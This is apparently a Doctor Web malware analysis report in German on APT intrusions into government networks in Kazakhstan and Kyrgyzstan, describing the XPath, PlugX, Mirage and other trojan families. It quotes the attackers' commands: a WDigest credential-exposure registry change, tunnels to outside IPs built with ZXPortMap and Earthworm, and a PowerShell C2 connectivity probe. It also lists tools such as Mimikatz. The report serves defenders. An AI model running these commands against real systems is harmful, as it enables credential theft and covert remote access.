20. Juli 2020

Einleitung

Gezielte Cyberangriffe auf große Unternehmen und staatliche Einrichtungen sind für IT-Sicherheitsspezialisten von besonderem Interesse. Die Untersuchung solcher Vorfälle ermöglicht es, Strategien und Tools, die Cyberkriminelle beim Hacken von Computersystemen verwenden, zu analysieren und entsprechende Gegenmaßnahmen zu erarbeiten. Die Software, die für gezielte Angriffe eingesetzt wird, ist in der Regel einzigartig und „maßgeschneidert“, da sie für ganz bestimmte Ziele und Aufgaben der Cyberkriminellen entwickelt und geheim gehalten wird. Im Unterschied zu Massenbedrohungen gelangen Muster solcher Malware selten zur Untersuchung in ein Virenlabor. Außerdem werden bei gezielten Angriffen komplexe Mechanismen verwendet, um Spuren böswilliger Aktivitäten zu verwischen, wodurch die Erkennung fremder Objekte in der Infrastruktur des angegriffenen Unternehmens erschwert wird.

Im März 2019 wandte sich eine der staatlichen Einrichtungen der Republik Kasachstan an Doctor Web. Man vermutete, dass einer der Computer des Behördennetzwerks infiziert wurde. Unsere Spezialisten führten eine Untersuchung durch. Sie erkannten und beschrieben eine Gruppe von Trojanern, die für einen umfassenden gezielten Angriff auf die Behörde genutzt wurden. Die Informationen, die wir ermittelten, ermöglichten es uns, die Tools und die Ziele der Cyberkriminellen herauszufinden. Während der Untersuchung stellte sich heraus, dass das Behördennetzwerk seit mindestens 2017 kompromittiert war.

Im Februar 2020 wandte sich eine der staatlichen Einrichtungen der Kirgisischen Republik an Doctor Web: Das Behördennetzwerk wies Merkmale einer Infektion auf. Unsere Experten erkannten eine Reihe von Schadprogrammen im Behördennetzwerk, unter ihnen auch einige von denen, die beim oben erwähnten Cyberangriff in Kasachstan verwendet worden waren. Die Analyse zeigte, dass die Infektion viel früher erfolgte (wie im oben beschriebenen Vorfall) – bereits im März 2017.

Da die unbefugte Präsenz von Malware in den beiden Netzwerken mindestens drei Jahre andauerte und bei der Untersuchung der Serverberichte ganz verschiedene Trojaner erkannt wurden, nehmen wir an, dass diese Angriffe von mehreren Hacker-Teams organisiert wurden. Einige der eingesetzten Trojaner sind gut bekannt: Es handelt sich um einzigartige Tools bekannter APT-Teams und um Schadprogramme, die von verschiedenen chinesischen APT-Teams verwendet werden.

Allgemeine Informationen über die Angriffe und die verwendeten Tools

Wir führten eine sorgfältige Untersuchung mehrerer Server in den Netzwerken der betroffenen Einrichtungen in Kasachstan und Kirgisistan durch. Alle untersuchten Geräte laufen unter Microsoft Windows.

Die in den gezielten Angriffen eingesetzten Schadprogramme lassen sich in zwei Gruppen unterteilen:

• Massenbedrohungen – Die Schadprogramme wurden auf den meisten Computern des Netzwerks installiert.
• Spezialisierte Malware – Die Schadprogramme wurden auf den Servern installiert, die für die Cyberkriminellen von besonderem Interesse waren.

Die Untersuchung der Malwaremuster und der von den Cyberkriminellen verwendeten Tools ergab das folgende Angriffsszenario. Die Cyberkriminellen nutzten erkannte Schwachstellen aus, um sich Zugriff auf einen der Computer im Netzwerk zu verschaffen und einen der Trojaner der Familie BackDoor.PlugX darauf zu installieren. Die Payload-Module des Trojaners ermöglichten es, den infizierten Computer aus der Ferne zu verwalten, um weitere Computer im Netzwerk zu infizieren. Ein weiterer Trojaner, der zur Infektion genutzt wurde, war vermutlich BackDoor.Whitebird.1. Das Backdoor-Programm wurde für 64-Bit-Betriebssysteme entwickelt und verfügte über eine ziemlich weite Funktionalität: Unterstützung einer verschlüsselten Verbindung mit dem Verwaltungsserver sowie Dateimanager-, Proxy- und Fernsteuerungsfunktionen.

Nachdem sich die Hackergruppe den Zugriff auf das Netzwerk verschaffen hatte, nutzte sie spezialisierte Schadprogramme, um ihre Aufgaben zu erledigen. Die Trojaner infizierten folgende Geräte:

Domain-Controller #1:

Trojan.Misics
Trojan.XPath

Domain-Controller #2:

Trojan.Misics
Trojan.Mirage

Domain-Controller #3:

BackDoor.Mikroceen
BackDoor.Logtu

Server #1:

BackDoor.Mikroceen

Server #2:

Trojan.Mirage
BackDoor.CmdUdp.1

Besonders interessant ist die Trojaner-Familie XPath, deren Beschreibung zuvor noch nicht veröffentlicht wurde, soweit wir wissen. Die Familie verfügt über ein Rootkit, das es ermöglicht, ihre Aktivitäten im infizierten Netzwerk und die Spuren ihrer Präsenz im kompromittierten System zu verstecken. Das auf dem betroffenen Server installierte Rootkit konnte mithilfe des Dr.Web Anti-Rootkits erkannt werden. Die von uns untersuchten Muster wurden zwischen 2017 und 2018 zusammengestellt. Diese Programme basieren auf Open-Source-Projekten, die bereits einige Jahre zuvor veröffentlicht worden waren. In den untersuchten Mustern wurden einige Versionen des zwischen 2013 und 2015 veröffentlichten WinDivert-Pakets verwendet. Dies kann darauf hinweisen, dass die ersten Modifikationen von XPath auch in dieser Periode entwickelt worden sein können.

XPath ist ein modularer Trojaner, in dem jede Komponente einer bestimmten Phase in der Funktion der Malware entspricht. Die Infektion beginnt mit dem Start des Programms Trojan.XPath.1, das die weiteren Komponenten installiert. Das Installationsprogramm verwendet die integrierte verschlüsselte Konfiguration und führt die Payload durch die Installation des Treibers oder mithilfe des Verfahrens COM Hijacking aus. Das Programm nutzt die Windows-Registry zum Speichern seiner Module. Dabei werden die Daten verschlüsselt und komprimiert.

Trojan.XPath.2 ist ein Treiber. Er dient zum Tarnen der bösartigen Aktivität im kompromittierten System und startet ein weiteres Modul. Der Treiber hat chinesische digitale Signaturen und basiert auf Open-Source-Projekten. Im Unterschied zu anderen Komponenten, die in der Windows-Registry gespeichert werden, befinden sich die Dateien des Treibers auf der Festplatte. Dabei wird das Programm heimlich ausgeführt. Neben dem Verstecken der Treiberdatei auf der Festplatte erfüllt die Komponente noch einige Aufgaben. Sie implementiert den Payload-Starter in den Prozess lsass.exe und tarnt die Netzwerkaktivität des Trojaners. Das Szenario kann je nach Version des Betriebssystems variieren.

Die dritte Komponente heißt PayloadDll.c. Die Bibliothek Trojan.XPath.3 ist ein Zwischenmodul und dient zur Implementierung der in der Registry gespeicherten Payload in den Prozess svhost.exe mithilfe des Verfahrens COM Hijacking.

Das Payload-Modul Trojan.XPath.4 enthält die Hauptfunktionalität. Die Komponente ist in C ++ geschrieben und basiert auch auf Open-Source-Projekten. Wie die meisten untersuchten Schadprogramme ermöglicht es dieser Trojaner Cyberkriminellen, sich unbefugten Zugriff auf infizierte Computer zu verschaffen und vertrauliche Informationen zu stehlen. Er zeichnet sich dadurch aus, dass er in zwei Modi ausgeführt werden kann: im Client-Modus und im Agentenmodus. Im Client-Modus stellt der Trojaner eine Verbindung zum Verwaltungsserver her und wartet auf Befehle vom Server. Im Agentenmodus agiert Trojan.XPath.4 als Server: Er überwacht bestimmte Ports und sendet Befehle an Clients, die sich an diese Ports anschließen. Die Entwickler sahen also die Implementierung eines lokalen Verwaltungsservers innerhalb des angegriffenen Netzwerks vor, um Befehle vom externen Verwaltungsserver an infizierte Computer in diesem Netzwerk weiterzuleiten.

Eine detaillierte Beschreibung der Funktionalität von XPath finden Sie in der PDF-Datei mit der Untersuchung und in der Dr.Web Virenbibliothek.

Interessant ist auch die Implementierung des Zugriffs auf den Befehlsinterpreter durch den Trojaner Mirage. Vom infizierten Server konnten wir die Dateien abrufen, die das Schadprogramm zur Weiterleitung der Ein- und Ausgabe des Befehlsinterpreters verwendete. So konnten wir die von den Cyberkriminellen mithilfe dieser Funktionalität ausgeführten Befehle und die als Antwort empfangenen Daten sehen.

reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f
ipconfig /displaydns
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 53,80,443
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 143,110
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest

Bei der ausführbaren Datei windbg.exe handelte es sich um einen Scanner von TCP/UPD-Ports PortQry.

Während unserer Untersuchung fanden wir Hinweise, die indirekt den Zusammenhang zwischen den gezielten Angriffen auf die staatlichen Einrichtungen in Zentralasien bestätigen. Z.B. nutzte eines der entdeckten Muster von BackDoor.PlugX.38 die Domain nicodonald[.]accesscam[.]org als Verwaltungsserver. Dieselbe Domain wurde auch als Verwaltungsserver für BackDoor.Apper.14 (auch bekannt als ICEFOG NG) genutzt. Einige Jahre zuvor hatten wir ein Backdoor-Programm dieser Familie in einer Phishing-Mail an eine der staatlichen Einrichtungen Kasachstans erkannt. Darüber hinaus wurde eine RTF-Datei, die dieses Muster von BackDoor.Apper.14 installierte, auf VirusTotal zum ersten Mal am 19. März 2019 aus Kasachstan geladen.

Im Rahmen des Vorfalls in Kirgisistan wurde auch ein interessanter Fund gemacht: das Backdoor-Programm Logtu. Es wurde auf dem infizierten Server neben Mikroceen erkannt. Neben einem ähnlichen Satz von Schadprogrammen kann eben die Nutzung von Mikroceen davon zeugen, dass die beiden Angriffe zusammenhängen. Ein Muster dieses spezialisierten Backdoor-Programms wurde in den beiden betroffenen Netzwerken erkannt. In beiden Fällen wurde er auf einem Domain-Controller installiert.

Bei der Suche nach Mustern im Zusammenhang mit diesen Angriffen wurde ein speziell vorbereitetes Backdoor-Programm gefunden, das den BIND Shell-Zugriff auf den Befehlsinterpreter realisiert. Der Pfad zu den Debug-Informationen enthält den Namen des Projekts auf Chinesisch – 正向马源码, der auf die entsprechende Herkunft des Trojaners hinweisen kann.

Außerdem nutzten die Cyberkriminellen folgende freie Dienstprogramme, um weitere Computer im Netzwerk zu infizieren:

• Mimikatz
• TCP Port Scanner V1.2 By WinEggDrop
• Nbtscan
• PsExec
• wmiexec.vbs
• goMS17-010
• ZXPortMap v1.0 By LZX
• Earthworm
• PortQry version 2.0 GOLD

Unten finden Sie Beispiele für die Ausführung einiger der genannten Dienstprogramme.

• ZXPortMap: vmwared.exe 21 46.105.227.110 53
• Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53

Die APT-Gruppe verwendete auch ihre eigenen PowerShell-Skripte, um Informationen über den infizierten Computer und weitere Geräte im Netzwerk zu sammeln, sich an die Verwaltungsserver vom infizierten Computer anzuschließen etc. Darüber hinaus fanden wir ein PowerShell-Skript, das es den Cyberkriminellen ermöglichte, den gesamten Inhalt der E-Mail-Postfächer mehrerer Mitarbeiter der betroffenen Organisation aus dem Microsoft Exchange Server herunterzuladen.

Hier sind einige Beispiele für PowerShell-Skripte, die auf den infizierten Servern ausgeführt wurden.

%COMSPEC% /Q /c tasklist /v >>c:\programdata\2.txt
%COMSPEC% /Q /c systeminfo >>c:\programdata\2.txt
%COMSPEC% /Q /c netstat -nvb    >> c:\programdata\2.txt
powershell -exec bypass -command "& {  foreach($i in 53,80,443){ echo ((new-object Net.Sockets.TcpClient).Connect('v.nnncity.xyz',$i))  "port:"$i } 2 > $null  }" >>c:\programdata\2.txt

Schlussfolgerung

Während der Untersuchung erkannten unsere Spezialisten mehrere Trojaner-Familien, die in diesen Angriffen verwendet wurden. Die Analyse der Muster und der bösartigen Aktivität zeigte, dass die Netzwerkinfrastruktur lange vor der Erkennung der ersten Infektionsmerkmale durch die Mitarbeiter kompromittiert wurde. Leider ist dieses Szenario eines der Attribute erfolgreicher APT-Angriffe: Dabei schenken Virenschreiber viel Aufmerksamkeit dem Tarnen ihrer Präsenz im infizierten System.

Der primäre Infektionsvektor und das Gesamtbild der Infektion wurden von der Untersuchung ausgeklammert. Wir denken jedoch, dass die im Bericht beschriebenen Trojaner nur ein Teil der in diesen Angriffen eingesetzten Schadprogramme sind. Die von den Hackern verwendeten Mechanismen erschweren sowohl die Erkennung von Eingriffen als auch die Wiederherstellung der Kontrolle über kompromittierte Netzwerkobjekte.

Um Risiken zu reduzieren, ist eine ständige Überwachung der internen Netzwerkressourcen erforderlich, insbesondere der Server, die für Cyberkriminelle von besonders großem Interesse sind: Domain-Controller, Mailserver und Internet-Gateways. Falls das System kompromittiert wird, ist eine umgehende und detaillierte Analyse des Vorfalls erforderlich, um entsprechende Gegenmaßnahmen zu erarbeiten. Doctor Web entwickelt nicht nur Virenschutzlösungen, sondern untersucht auch virenbedingte Vorfälle, unter anderem gezielte Angriffe. Wenn Sie den Verdacht haben, dass Ihr Unternehmensnetzwerk infiziert wurde, wenden Sie sich an das Virenlabor von Doctor Web. Umgehende Gegenmaßnahmen ermöglichen es, den Schaden zu reduzieren und schwere Auswirkungen gezielter Cyberangriffe zu verhindern.

Merkmale der Kompromittierung.